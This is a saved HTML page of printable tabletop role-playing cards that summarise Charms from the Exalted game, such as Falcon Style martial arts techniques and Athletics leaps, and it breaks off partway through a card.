<!DOCTYPE html>
<!-- saved from url=(0186)file:///E:/Obsidian%20Circe/BFV/%D0%98%D0%B3%D1%80%D1%8B%20%D0%B0%D0%BA%D1%82%D0%B8%D0%B2%D0%BD%D1%8B%D0%B5/Exalted%20Notes/%D0%91%D0%B0%D0%BD%D0%B3/Bang%20Charm%20Cards/RPG%20cards.html -->
<html lang="en" data-arp=""><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <!-- Global site tag (gtag.js) - Google Analytics -->
    <!--<script async src="https://www.googletagmanager.com/gtag/js?id=UA-61016456-4"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());

        gtag('config', 'UA-61016456-4');
    </script>-->
    <title>RPG cards</title>
    <!-- Javascript -->
    <script type="text/javascript" src="./Bang Charm cards_files/output.js.Без названия"></script>
    <!-- Fonts -->
    <link href="./Bang Charm cards_files/css" rel="stylesheet" type="text/css">
    <link href="./Bang Charm cards_files/css(1)" rel="stylesheet" type="text/css">
    <link href="./Bang Charm cards_files/game-icons.css" rel="stylesheet">
    <!-- CSS -->
    <link rel="stylesheet" type="text/css" href="./Bang Charm cards_files/output.css">
    <link rel="stylesheet" type="text/css" href="./Bang Charm cards_files/cards.css">
    <link rel="stylesheet" type="text/css" href="./Bang Charm cards_files/card-size.css">
    <link rel="stylesheet" type="text/css" href="./Bang Charm cards_files/icons.css">
    <link rel="stylesheet" type="text/css" href="./Bang Charm cards_files/custom-icons.css">
    <link href="./Bang Charm cards_files/style.css" rel="stylesheet">
<script type="text/javascript" src="./Bang Charm cards_files/1"></script><script type="text/javascript" src="./Bang Charm cards_files/1(1)"></script></head>
<body class="page-background"><div class="output-container" id="output-container"><style>
@page {
    margin: 0;
    size:210mm 297mm;
    -webkit-print-color-adjust: exact;
}
</style>
<page class="page page-preview portrait" style="background-color:white;;width:210mm;height:297mm;">
<div class="page-zoom page-zoom-preview" style="transform: scale(1);;width:210mm;height:297mm;">
<div class="card rounded-corners" style="color:lightSteelBlue; border-color:lightSteelBlue; background-color:lightSteelBlue;width:2.5in;height:3.5in;"><div class="card-header"><div class="card-title card-title-13">Keywords</div><div class="card-title-inlineicon-container">    <img class="card-title-inlineicon icon-white-book-0" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div></div><div class="card-content-container"><span class="card-fill" style="flex:1"></span>
<div class="card-element card-property-line card-font-size-12">   <h4 class="card-property-name">Mute</h4>   <p class="card-p card-property-text">Charm’s cost will not add to Exalt’s anima level unless he wants it to.</p></div>
<div class="card-element card-property-line card-font-size-12">   <h4 class="card-property-name">Form</h4>   <p class="card-p card-property-text">Only one MA Form Charm active at time. Switching, pay the difference in motes.</p></div>
<div class="card-element card-property-line card-font-size-12">   <h4 class="card-property-name">Mastery</h4>   <p class="card-p card-property-text">In MA Charms, some greater effect for Solaroids.</p></div>
<span class="card-fill" style="flex:1"></span>
<div class="card-element card-property-line card-font-size-12">   <h4 class="card-property-name">Decisive-only</h4>   <p class="card-p card-property-text">If it’s an attack Charm, it can only be used with decisive attack. If it is defensive, only to defend against decisive attack.</p></div>
<div class="card-element card-property-line card-font-size-12">   <h4 class="card-property-name">Uniform</h4>   <p class="card-p card-property-text">This Charm has the same function for both withering and decisive attacks or defenses</p></div>
<span class="card-fill" style="flex:1"></span>


</div></div>
<div class="card rounded-corners" style="color:dimgray; border-color:dimgray; background-color:dimgray;width:2.5in;height:3.5in;"><div class="card-header"><div class="card-title card-title-13">Fists of Iron Technique</div><div class="card-title-inlineicon-container">    <img class="card-title-inlineicon icon-fist" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div></div><div class="card-content-container"><div class="card-element card-subtitle"><div>Brawn 1, Ess 1</div></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Cost</h4>   <p class="card-p card-property-text">1m</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Type</h4>   <p class="card-p card-property-text">Reflexive</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Duration</h4>   <p class="card-p card-property-text">Instant</p></div>
<svg class="card-ruler" height="1" width="100" viewBox="0 0 100 1" preserveAspectRatio="none" xmlns="http://www.w3.org/2000/svg">    <polyline points="0,0 100,0.5 0,1" fill="dimgray"></polyline></svg>

<div class="card-element card-description-line">   <p class="card-p card-description-text">This Charm allows the Exalt to <b>parry lethal damage with his bare hands</b>. In addition, his bare-handed <b>decisive strike does lethal damage</b> and his <b>withering damage ignores (Essence + Intimacy) soak</b>. The Intimacy in this context can be a Tie (as the Solar strikes a hated enemy or defends a beloved friend) or a Principle (as the Solar exults in the thrill of violence).</p></div>

</div></div>
<div class="card rounded-corners" style="color:Turquoise; border-color:Turquoise; background-color:Turquoise;width:2.5in;height:3.5in;"><div class="card-header"><div class="card-title card-title-13">Drifting Leaf Elusion</div><div class="card-title-inlineicon-container">    <img class="card-title-inlineicon icon-dodging" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div></div><div class="card-content-container"><div class="card-element card-subtitle"><div>Dodge 2, Ess 1</div></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Cost</h4>   <p class="card-p card-property-text">1m</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Type</h4>   <p class="card-p card-property-text">Reflexive</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Duration</h4>   <p class="card-p card-property-text">Instant</p></div>
<svg class="card-ruler" height="1" width="100" viewBox="0 0 100 1" preserveAspectRatio="none" xmlns="http://www.w3.org/2000/svg">    <polyline points="0,0 100,0.5 0,1" fill="Turquoise"></polyline></svg>

<div class="card-element card-description-line">   <p class="card-p card-description-text">The Exalt slips away from an attack that would have struck her. When using this Charm, the Solar <b>successfully evades an attack roll bearing successes equal to his Evasion</b>. This Charm may be invoked after the attack roll is made.</p></div>
<div class="card-element card-description-line">   <p class="card-p card-description-text"></p></div>
<span class="card-fill" style="flex:10"></span>

</div></div>
<div class="card rounded-corners" style="color:RosyBrown; border-color:RosyBrown; background-color:RosyBrown;width:2.5in;height:3.5in;"><div class="card-header"><div class="card-title card-title-13">Falcon Style Art</div><div class="card-title-inlineicon-container">    <img class="card-title-inlineicon icon-falcon-moon" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div></div><div class="card-content-container"><div class="card-element card-description-line card-font-size-11">   <p class="card-p card-description-text">Falcon style is a high-flying art, its practitioners leaping across the battlefield to deliver powerful strikes or claim elevated vantages from which to deliver the finishing blow. In addition to attacks executed in midair, the style makes heavy use of grappling, locking enemies into painful submission holds or throwing them to the ground before executing punishing follow-ups.</p></div>
<div class="card-element card-description-line card-font-size-11">   <p class="card-p card-description-text">Its techniques are showy and spectacular, and many Falcon stylists draw flocks of bystanders to their fights — whether they’re wandering folk heroes or ruthlessly dishonorable brutes. Falcon style is most prominent in the South, although iconic masters have spread it to other directions.</p></div></div></div>
<div class="card rounded-corners" style="color:RosyBrown; border-color:RosyBrown; background-color:RosyBrown;width:2.5in;height:3.5in;"><div class="card-header"><div class="card-title card-title-13">Falcon Style Require</div><div class="card-title-inlineicon-container">    <img class="card-title-inlineicon icon-falcon-moon" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div></div><div class="card-content-container"><div class="card-element card-description-line card-font-size-12">   <p class="card-p card-description-text"><b>Falcon Weapons</b>: Falcon style’s unarmed attacks use all four limbs and  eadbutts. It’s compatible with the cestus, iron boots, tiger claws, and medium or heavy improvised weapons that deal bashing damage. Unarmed attacks enhanced by Falcon Charms can be stunted to deal lethal damage.</p></div>
<div class="card-element card-description-line card-font-size-12">   <p class="card-p card-description-text"><b>Armor</b>: Falcon style is compatible with light armor.</p></div>
<div class="card-element card-description-line card-font-size-12">   <p class="card-p card-description-text"><b>Complementary Abilities</b>: Falcon stylists use<b> Athletics and Dodge</b> for battlefield maneuverability</p></div>
<div class="card-element card-description-line card-font-size-12">   <p class="card-p card-description-text">Falcon style is a high-flying art, its practitioners leaping across the battlefield to deliver powerful strikes or claim elevated vantages from which to deliver the finishing blow. In addition to attacks executed in midair, the style makes heavy use of grappling, locking enemies into painful submission holds or throwing them to the ground before executing punishing follow-ups. Its techniques are showy and spectacular, and many Falcon stylists draw flocks of bystanders to their fights — whether they’re wandering folk heroes or ruthlessly dishonorable brutes. Falcon style is most prominent in the South, although iconic masters have spread it to other directions.</p></div></div></div>
<div class="card rounded-corners" style="color:RosyBrown; border-color:RosyBrown; background-color:RosyBrown;width:2.5in;height:3.5in;"><div class="card-header"><div class="card-title card-title-13">Falcon Takes Flight</div><div class="card-title-inlineicon-container">    <img class="card-title-inlineicon icon-falcon-moon" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div></div><div class="card-content-container"><div class="card-element card-subtitle"><div>Martial Arts 2, Ess 1</div></div>
<div class="card-element card-property-line card-font-size-11">   <h4 class="card-property-name">Cost</h4>   <p class="card-p card-property-text">3m</p>   <div style="float:right">       <h4 class="card-property-name">Type</h4>       <p class="card-p card-property-text">Supplemental</p>   </div></div>
<div class="card-element card-property-line card-font-size-11">   <h4 class="card-property-name">Key</h4>   <p class="card-p card-property-text">Uniform, Mastery</p>   <div style="float:right">       <h4 class="card-property-name">Duration</h4>       <p class="card-p card-property-text">Instant</p>   </div></div>
<svg class="card-ruler card-font-size-11" height="1" width="100" viewBox="0 0 100 1" preserveAspectRatio="none" xmlns="http://www.w3.org/2000/svg">    <polyline points="0,0 100,0.5 0,1" fill="RosyBrown"></polyline></svg>
<div class="card-element card-description-line card-font-size-11">   <p class="card-p card-description-text">Stylist takes off with powerful leap, executing graceful aerial maneuvers with supreme agility. He <b>adds (MA/2, round up) successes </b>on jumping or flying based <b>disengage, rush, or rise from prone action</b>. Alternatively, immediately after attacking enemy, he can use <b>reflexive move action to move away without needing to disengage</b>, while he moves directly upward.</p></div>
<span class="card-fill" style="flex:1"></span>
<h3 class="card-section" style="color:RosyBrown"><div>Mastery</div></h3>
<div class="card-element card-description-line card-font-size-11">   <p class="card-p card-description-text">If he is moving <u>to higher-elevation</u> terrain, or if he’s used a reflexive move action to do so that turn, <u>successes added are non-Charm</u>.</p></div>
</div></div>
<div class="card rounded-corners" style="color:RosyBrown; border-color:RosyBrown; background-color:RosyBrown;width:2.5in;height:3.5in;"><div class="card-header"><div class="card-title card-title-13">Swift Talon Strike</div><div class="card-title-inlineicon-container">    <img class="card-title-inlineicon icon-falcon-moon" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div></div><div class="card-content-container"><div class="card-element card-subtitle"><div>Martial Arts 2, Ess 1</div></div>
<div class="card-element card-property-line card-font-size-11">   <h4 class="card-property-name">Cost</h4>   <p class="card-p card-property-text">2m</p>   <div style="float:right">       <h4 class="card-property-name">Type</h4>       <p class="card-p card-property-text">Supplemental</p>   </div></div>
<div class="card-element card-property-line card-font-size-11">   <h4 class="card-property-name">Key</h4>   <p class="card-p card-property-text">Uniform, Mastery</p>   <div style="float:right">       <h4 class="card-property-name">Duration</h4>       <p class="card-p card-property-text">Instant</p>   </div></div>
<svg class="card-ruler card-font-size-11" height="1" width="100" viewBox="0 0 100 1" preserveAspectRatio="none" xmlns="http://www.w3.org/2000/svg">    <polyline points="0,0 100,0.5 0,1" fill="RosyBrown"></polyline></svg>
<div class="card-element card-description-line card-font-size-11">   <p class="card-p card-description-text">Launching herself at foe, stylist sharpens his talons with momentum and Essence. To use Charm, he must move into close range with enemy and attack him on the same turn, adding <b>1 auto-success on attack roll</b>. He <b>rerolls 1s until they cease to appear on damage roll or control grapple roll</b>. If stylist moved downward to reach close range, he <b>rerolls 2s as well as 1s</b>.</p></div>
<span class="card-fill" style="flex:1"></span>
<h3 class="card-section" style="color:RosyBrown"><div>Mastery</div></h3>
<div class="card-element card-description-line card-font-size-11">   <p class="card-p card-description-text">If the stylist moved <u>downward to reach close range, success added to attack roll is non-Charm</u>.</p></div>




</div></div>
<div class="card rounded-corners" style="color:RosyBrown; border-color:RosyBrown; background-color:RosyBrown;width:2.5in;height:3.5in;"><div class="card-header"><div class="card-title card-title-13">Raptor’s Fatal Descent</div><div class="card-title-inlineicon-container">    <img class="card-title-inlineicon icon-falcon-moon" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div></div><div class="card-content-container"><div class="card-element card-subtitle"><div>Martial Arts 3, Ess 1</div></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Cost</h4>   <p class="card-p card-property-text">2m, 1wp</p>   <div style="float:right">       <h4 class="card-property-name">Duration</h4>       <p class="card-p card-property-text">Instant</p>   </div></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Key</h4>   <p class="card-p card-property-text">Decisive-only, Mastery</p>   <div style="float:right">       <h4 class="card-property-name">Type</h4>       <p class="card-p card-property-text">Simple</p>   </div></div>
<svg class="card-ruler" height="1" width="100" viewBox="0 0 100 1" preserveAspectRatio="none" xmlns="http://www.w3.org/2000/svg">    <polyline points="0,0 100,0.5 0,1" fill="RosyBrown"></polyline></svg>
<div class="card-element card-description-line">   <p class="card-p card-description-text">Stylist executes brutal aerial attack, plummeting down onto foe to strike with stunning force. He makes <b>decisive attack</b> against <b>prone enemy, or an enemy 1 range band vertically beneath</b>.</p></div>
<div class="card-element card-description-line">   <p class="card-p card-description-text">He adds max (Athletics or STR) <b>extra successes on attack roll as damage dice</b>. For <b>each 10 on damage roll, enemy -1 Initiative</b> (Solar don't gain). This leaves <b>stylist prone, but with no penalties</b>; however, he can’t use this Charm again until he’s risen.</p></div>
<div class="card-element card-description-line">   <p class="card-p card-description-text"><b>Mastery</b>: leaps down doesn't count as move action.</p></div>

</div></div>
<div class="card rounded-corners" style="color:RosyBrown; border-color:RosyBrown; background-color:RosyBrown;width:2.5in;height:3.5in;"><div class="card-header"><div class="card-title card-title-13">Falcon Form</div><div class="card-title-inlineicon-container">    <img class="card-title-inlineicon icon-falcon-moon" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div></div><div class="card-content-container"><div class="card-element card-subtitle"><div>Martial Arts 4, Ess 1</div></div>
<div class="card-element card-property-line card-font-size-10">   <h4 class="card-property-name">Cost</h4>   <p class="card-p card-property-text">8m</p>   <div style="float:right">       <h4 class="card-property-name">Type</h4>       <p class="card-p card-property-text">Simple</p>   </div></div>
<div class="card-element card-property-line card-font-size-10">   <h4 class="card-property-name">Keywords</h4>   <p class="card-p card-property-text">Form</p>   <div style="float:right">       <h4 class="card-property-name">Duration</h4>       <p class="card-p card-property-text">One Scene</p>   </div></div>
<svg class="card-ruler card-font-size-10" height="1" width="100" viewBox="0 0 100 1" preserveAspectRatio="none" xmlns="http://www.w3.org/2000/svg">    <polyline points="0,0 100,0.5 0,1" fill="RosyBrown"></polyline></svg>
<div class="card-element card-description-line card-font-size-10">   <p class="card-p card-description-text">Spreading arms wide in emulation of falcon’s wingspan, stylist enters a stance as nimble as it's formidable. He <b>doubles 9s on grapple control</b> rolls and <b>adds (Athletics) to rounds of control</b> from which his throws and slams can benefit (Core p.201).</p></div>
<div class="card-element card-description-line card-font-size-10">   <p class="card-p card-description-text">He can use reflexive move actions to jump 1 range band straight up without rolling, and <b>falling damage halves round down</b>. He gains <u>+1 Defense against non-ranged attacks from enemies at lower</u> elevation, unless they have <b>Reaching</b> tag.</p></div>
<span class="card-fill" style="flex:1"></span>
<h3 class="card-section" style="color:RosyBrown"><div></div></h3>
<div class="card-element card-description-line card-font-size-10">   <p class="card-p card-description-text"><b>Special activation rules</b>: When the stylist succeeds on an opposed movement roll or a grapple control roll with 5+ successes, he may reflexively enter Falcon Form.</p></div>

</div></div></div>
</page>
<page class="page page-preview portrait" style="background-color:white;;width:210mm;height:297mm;">
<div class="page-zoom page-zoom-preview" style="transform: scale(1);;width:210mm;height:297mm;">
<div class="card rounded-corners" style="color:Navy; border-color:Navy; background-color:Navy;width:2.5in;height:3.5in;"><div class="card-header"><div class="card-title card-title-13">Blinding Battle Feint</div><div class="card-title-inlineicon-container">    <img class="card-title-inlineicon icon-cloak-dagger" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div></div><div class="card-content-container"><div class="card-element card-subtitle"><div>Stealth 3, Ess 1</div></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Cost</h4>   <p class="card-p card-property-text">3m</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Type</h4>   <p class="card-p card-property-text">Supplemental</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Duration</h4>   <p class="card-p card-property-text">Instant</p></div>
<svg class="card-ruler" height="1" width="100" viewBox="0 0 100 1" preserveAspectRatio="none" xmlns="http://www.w3.org/2000/svg">    <polyline points="0,0 100,0.5 0,1" fill="Navy"></polyline></svg>
<div class="card-element card-description-line">   <p class="card-p card-description-text">The Solar leaps in and out of battle with nigh untraceable speed. He may use <b>(Dexterity + Stealth) to Join Battle, also as attempt to enter Stealth</b>. If he beats opponent’s Awareness-based Join Battle roll, he is automatically concealed, so long as there is place to hide.</p></div>
<div class="card-element card-description-line">   <p class="card-p card-description-text">If foe uses Join Battle not with Awareness, he must make Awareness roll to spot Solar with <b>penalty (diff in Initiative)</b>, even if he rolled higher. If he fails check, Solar still vanishes from view.</p></div>
</div></div>
<div class="card rounded-corners" style="color:Maroon; border-color:Maroon; background-color:Maroon;width:2.5in;height:3.5in;"><div class="card-header"><div class="card-title card-title-10">Ideal Battle Knowledge Prana</div><div class="card-title-inlineicon-container">    <img class="card-title-inlineicon icon-warlord-helmet" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div></div><div class="card-content-container"><div class="card-element card-subtitle"><div>War 2, Ess 1</div></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Cost</h4>   <p class="card-p card-property-text">3m</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Type</h4>   <p class="card-p card-property-text">Supplemental</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Duration</h4>   <p class="card-p card-property-text">Instant</p></div>
<svg class="card-ruler" height="1" width="100" viewBox="0 0 100 1" preserveAspectRatio="none" xmlns="http://www.w3.org/2000/svg">    <polyline points="0,0 100,0.5 0,1" fill="Maroon"></polyline></svg>
<div class="card-element card-description-line">   <p class="card-p card-description-text">The Sun’s Chosen speak in tongues of valor and know the ways of war. As one who has studied or waged war for a lifetime, the Solar simply knows what to do in any combat situation. This Charm applies the <b>double 9s rulex to all of the Solar’s order actions (p. 209). </b></p></div>
<span class="card-fill" style="flex:2"></span>
<h3 class="card-section" style="color:Maroon"><div>Upgrade</div></h3>
<div class="card-element card-description-line">   <p class="card-p card-description-text">At <b>War 5, Essence 3+</b>, the Exalt may pay 6 motes, 3 Initiative to enhance his orders with <b>double 8s</b></p></div>
<span class="card-fill" style="flex:3"></span></div></div>
<div class="card rounded-corners" style="color:DarkGoldenrod; border-color:DarkGoldenrod; background-color:DarkGoldenrod;width:2.5in;height:3.5in;"><div class="card-header"><div class="card-title card-title-13">Monkey Leap Technique</div><div class="card-title-inlineicon-container">    <img class="card-title-inlineicon icon-muscle-up" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div></div><div class="card-content-container"><div class="card-element card-subtitle"><div>Athletics 2, Ess 1</div></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Cost</h4>   <p class="card-p card-property-text">2m (1m after first if continue)</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Type</h4>   <p class="card-p card-property-text">Supplemental</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Duration</h4>   <p class="card-p card-property-text">Instant</p></div>
<svg class="card-ruler" height="1" width="100" viewBox="0 0 100 1" preserveAspectRatio="none" xmlns="http://www.w3.org/2000/svg">    <polyline points="0,0 100,0.5 0,1" fill="DarkGoldenrod"></polyline></svg>
<div class="card-element card-description-line">   <p class="card-p card-description-text">The Exalt leaps with the speed and grace of a striking hawk. Using this technique, a Solar may <b>automatically leap forward or straight up one range band</b>. A Solar using this Charm can easily leap to the top of a twenty foot wall or cross a Nexus street over rooftops, without having to roll. This <u>Charm counts as the Solar’s movement for the turn</u>. If Solar <b>continues to leap</b> to a different range band <b>each turn, cost is reduced to 1 mote after first activation.</b></p></div>
<div class="card-element card-description-line">   <p class="card-p card-description-text"></p></div>

</div></div>
<div class="card rounded-corners" style="color:DarkGoldenrod; border-color:DarkGoldenrod; background-color:DarkGoldenrod;width:2.5in;height:3.5in;"><div class="card-header"><div class="card-title card-title-13">Soaring Crane Leap</div><div class="card-title-inlineicon-container">    <img class="card-title-inlineicon icon-muscle-up" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div></div><div class="card-content-container"><div class="card-element card-subtitle"><div>Athletics 3, Ess 1</div></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Cost</h4>   <p class="card-p card-property-text">3m</p>   <div style="float:right">       <h4 class="card-property-name">Type</h4>       <p class="card-p card-property-text">Reflexive</p>   </div></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Duration</h4>   <p class="card-p card-property-text">Instant</p></div>
<svg class="card-ruler" height="1" width="100" viewBox="0 0 100 1" preserveAspectRatio="none" xmlns="http://www.w3.org/2000/svg">    <polyline points="0,0 100,0.5 0,1" fill="DarkGoldenrod"></polyline></svg>
<div class="card-element card-description-line">   <p class="card-p card-description-text">Striking efficacious pose, Exalt catches wind to slow a fall. This allows him to <b>drop down 2 range bands without damage</b>. For very long fall, Solar must use Charm once for 3 bands. He can also use it to drift long distances through the air, <b>expending move action to float forward single range band even as he continues to fall</b>. With adequate amount of thrust, he can glide across long horizontal distances without fall, equaling initial movement forward. Appropriate stunts can increase straight across movement before Exalt begins to drop.</p></div>

</div></div>
<div class="card rounded-corners" style="color:DarkGoldenrod; border-color:DarkGoldenrod; background-color:DarkGoldenrod;width:2.5in;height:3.5in;"><div class="card-header"><div class="card-title card-title-10">Increasing Strength Exercise</div><div class="card-title-inlineicon-container">    <img class="card-title-inlineicon icon-muscle-up" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div></div><div class="card-content-container"><div class="card-element card-subtitle"><div>Athletics 3, Ess 1</div></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Cost</h4>   <p class="card-p card-property-text">3m or 3i per dot</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Type</h4>   <p class="card-p card-property-text">Simple</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Duration</h4>   <p class="card-p card-property-text">One scene</p></div>
<svg class="card-ruler" height="1" width="100" viewBox="0 0 100 1" preserveAspectRatio="none" xmlns="http://www.w3.org/2000/svg">    <polyline points="0,0 100,0.5 0,1" fill="DarkGoldenrod"></polyline></svg>
<div class="card-element card-description-line">   <p class="card-p card-description-text">The Solar draws remarkable strength from deep within his core. For <b>every 3 motes or 3 Initiative</b> he spends, Strength score increases by 1. This Charm can't increase STR by more that [Essence] and to maximum of STR*2. Each dot of increase also <b>raises base damage of decisive attacks by 1. </b></p></div>
<div class="card-element card-description-line">   <p class="card-p card-description-text">Through use of Increasing Strength Exercise, Solars can reach the Strength minimums required to attempt certain <b>feats of strength (p. 229)</b></p></div>


</div></div>
<div class="card rounded-corners" style="color:DarkGoldenrod; border-color:DarkGoldenrod; background-color:DarkGoldenrod;width:2.5in;height:3.5in;"><div class="card-header"><div class="card-title card-title-11">Thunderbolt Attack Prana</div><div class="card-title-inlineicon-container">    <img class="card-title-inlineicon icon-muscle-up" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div></div><div class="card-content-container"><div class="card-element card-subtitle"><div>Athletics 3, Ess 1</div></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Cost</h4>   <p class="card-p card-property-text">4m, 1wp</p>   <div style="float:right">       <h4 class="card-property-name">Type</h4>       <p class="card-p card-property-text">Supplemental</p>   </div></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Key</h4>   <p class="card-p card-property-text">Decisive-only</p>   <div style="float:right">       <h4 class="card-property-name">Duration</h4>       <p class="card-p card-property-text">Instant</p>   </div></div>
<svg class="card-ruler" height="1" width="100" viewBox="0 0 100 1" preserveAspectRatio="none" xmlns="http://www.w3.org/2000/svg">    <polyline points="0,0 100,0.5 0,1" fill="DarkGoldenrod"></polyline></svg>
<div class="card-element card-description-line">   <p class="card-p card-description-text">Exalt draws down on Essence around, pulling it through upper body, lungs, core and down into legs, and then explodes skyward, rising in Essence-laden arc. Charm supplements <b>nonranged attack</b> which can be made <b>against aerial targets up to short range, or ground targets at another range </b>. Solar leaps at target, striking - <b>damage is doubled after roll</b>. If he uses attack to move to another range, it <u>counts as move action for round</u>. After striking aerial opponent, he may fall 1 range without damage.</p></div>



</div></div>
<div class="card rounded-corners" style="color:DarkGoldenrod; border-color:DarkGoldenrod; background-color:DarkGoldenrod;width:2.5in;height:3.5in;"><div class="card-header"><div class="card-title card-title-13">Graceful Crane Stance</div><div class="card-title-inlineicon-container">    <img class="card-title-inlineicon icon-muscle-up" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div></div><div class="card-content-container"><div class="card-element card-subtitle"><div>Athletics 1, Ess 1</div></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Cost</h4>   <p class="card-p card-property-text">3m</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Type</h4>   <p class="card-p card-property-text">Reflexive</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Duration</h4>   <p class="card-p card-property-text">One scene</p></div>
<svg class="card-ruler" height="1" width="100" viewBox="0 0 100 1" preserveAspectRatio="none" xmlns="http://www.w3.org/2000/svg">    <polyline points="0,0 100,0.5 0,1" fill="DarkGoldenrod"></polyline></svg>
<div class="card-element card-description-line">   <p class="card-p card-description-text">The Solar draws Essence through his pores and into his bones, suffusing and lightening his form and steadying his step. For the rest of the scene, he has perfect balance, and can stand or run on things too narrow or weak to support her normally, with no chance of falling or breaking through. he can run on a guy wire, stand on a crumbling parapet, balance on the tip of a pine tree, and perform many similar feats <b>without needing to roll (Dexterity + Athletics)</b></p></div>
<span class="card-fill" style="flex:3"></span></div></div>
<div class="card rounded-corners" style="color:DarkGoldenrod; border-color:DarkGoldenrod; background-color:DarkGoldenrod;width:2.5in;height:3.5in;"><div class="card-header"><div class="card-title card-title-13">Lightning Speed</div><div class="card-title-inlineicon-container">    <img class="card-title-inlineicon icon-muscle-up" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div></div><div class="card-content-container"><div class="card-element card-subtitle"><div>Athletics 3, Ess 1</div></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Cost</h4>   <p class="card-p card-property-text">3m</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Type</h4>   <p class="card-p card-property-text">Supplemental</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Duration</h4>   <p class="card-p card-property-text">Instant</p></div>
<svg class="card-ruler" height="1" width="100" viewBox="0 0 100 1" preserveAspectRatio="none" xmlns="http://www.w3.org/2000/svg">    <polyline points="0,0 100,0.5 0,1" fill="DarkGoldenrod"></polyline></svg>
<div class="card-element card-description-line">   <p class="card-p card-description-text">Like a flashing bolt, the Exalt streaks toward his goal, trailing streamers of anima. This Charm can be used to enhance a <b>rush action (see p. 197)</b>. The Exalt moves with terrific speed — <b> reroll all 5s and 6s until 5s and 6s fail to appear and add 1 automatic success</b>. Lightning Speed can also be used each interval of a <b>foot race or other test of speed (see p. 189).</b></p></div>


</div></div>
<div class="card rounded-corners" style="color:DarkGoldenrod; border-color:DarkGoldenrod; background-color:DarkGoldenrod;width:2.5in;height:3.5in;"><div class="card-header"><div class="card-title card-title-13">Feather Foot Style</div><div class="card-title-inlineicon-container">    <img class="card-title-inlineicon icon-muscle-up" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"></div></div><div class="card-content-container"><div class="card-element card-subtitle"><div>Athletics 3, Ess 1</div></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Cost</h4>   <p class="card-p card-property-text">3m</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Type</h4>   <p class="card-p card-property-text">Reflexive</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Key</h4>   <p class="card-p card-property-text">Mute</p></div>
<div class="card-element card-property-line">   <h4 class="card-property-name">Duration</h4>   <p class="card-p card-property-text">Until the Exalt stops running</p></div>
<svg class="card-ruler" height="1" width="100" viewBox="0 0 100 1" preserveAspectRatio="none" xmlns="http://www.w3.org/2000/svg">    <polyline points="0,0 100,0.5 0,1" fill="DarkGoldenrod"></polyline></svg>
